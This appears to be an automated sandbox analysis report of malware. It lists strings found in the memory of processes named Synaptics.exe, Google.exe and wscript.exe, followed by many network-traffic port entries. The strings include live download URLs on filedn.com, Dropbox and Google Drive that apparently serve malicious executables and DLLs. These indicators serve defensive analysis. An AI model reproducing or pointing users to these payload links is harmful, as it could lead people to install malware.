                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadym
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyrC%
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadywC
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzW
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadza
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~6
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~d
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goou0
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontenI
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2295450672.000000000EFE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVG
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZV
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.0000000007082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-x
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.0000000007075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?D
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.0000000007075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                            Source: Synaptics.exe, 0000001A.00000002.2300716020.000000000F138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclic
                            Source: Synaptics.exe, 0000001A.00000002.2300716020.000000000F138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadplM
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadplMg
                            Source: Synaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwHa
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwHawHa
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/fife.google.
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/t
                            Source: wscript.exe, 00000000.00000002.1495490799.000001C7E50B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/
                            Source: wscript.exe, 00000000.00000003.1491533263.000001C7E28D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe
                            Source: wscript.exe, 00000000.00000003.1491439603.000001C7E28BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495274061.000001C7E28D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1491533263.000001C7E28D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe(
                            Source: wscript.exe, 00000000.00000002.1495561900.000001C7E50B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1492572739.000001C7E50B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe22658-3693405117-2476756634-1003o
                            Source: wscript.exe, 00000000.00000003.1491439603.000001C7E28BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495274061.000001C7E28D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1491533263.000001C7E28D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exeD
                            Source: wscript.exe, 00000000.00000003.1491592783.000001C7E2850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495123949.000001C7E2852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exej8/
                            Source: wscript.exe, 00000000.00000002.1495561900.000001C7E50B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1492572739.000001C7E50B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=H
                            Source: Google.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                            Source: Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                            Source: Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
